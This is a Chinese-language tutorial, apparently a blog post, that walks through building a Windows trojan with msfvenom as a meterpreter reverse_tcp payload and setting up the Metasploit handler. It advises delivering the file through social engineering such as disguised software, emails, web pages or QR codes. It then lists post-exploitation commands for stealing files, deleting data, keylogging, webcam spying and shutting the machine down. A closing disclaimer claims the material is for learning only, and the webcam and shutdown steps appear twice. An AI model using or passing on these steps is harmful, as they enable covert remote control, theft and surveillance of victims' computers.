文章目录
01 木马概述
- 01 木马概述
- 02 木马的组成
- 03 木马的危害
- 04 利用MSFvenom制作木马
- 05 开启针对 reverse_ tcp监听得端口
- 06 客户运行木马
- 07 木马反弹shell成功
- 08 操作
- 免责声明
- 木马通常称为黑客程序恶意代码也称为特洛伊木马。
- 基于远程控制的黑客工具
-
客户端程序(生成木马) 客户端程序黑客方的控制台,它负责远程遥控指挥
-
服务器端程序(被攻击方) 服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡
- 盗取用户信息 如:网游账户、网银信息、QQ密码等
- 占用系统资源,降低电脑效能
- 将本机作为工具来攻击其他设备,也称为肉鸡
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.232.140 lport=8888 -f exe -o qwe.exe
-p payload
-f 生成文件的后缀名
-o 生成的文件名称
攻击方开启4444窗口
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.140
set lport 8888
exploit/run
此处需要运用到社会工程学,如软件绑定伪装、邮件伪装、木马网页、二维码等
将生成的木马传到被攻击的主机,并点击运行
- 查看系统信息
sysinfo
ipconfig
id
whoami
- 切换路径与浏览内容
pwd
dir
cd
dir 路径
download 文件名
upload 文件名
- 删除文件
rm 路径 文件
rmdir 路径 文件夹
- 键盘记录
screenshot
ps | grep notepad
migrate PID
run post/windows/capture/keylog_recorder
- 摄像头监控
help webcam
webcam_snap
webcam_stream
- 关机
shutdown
- 摄像头监控
help webcam
webcam_snap
webcam_stream
- 关机
shutdown
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!
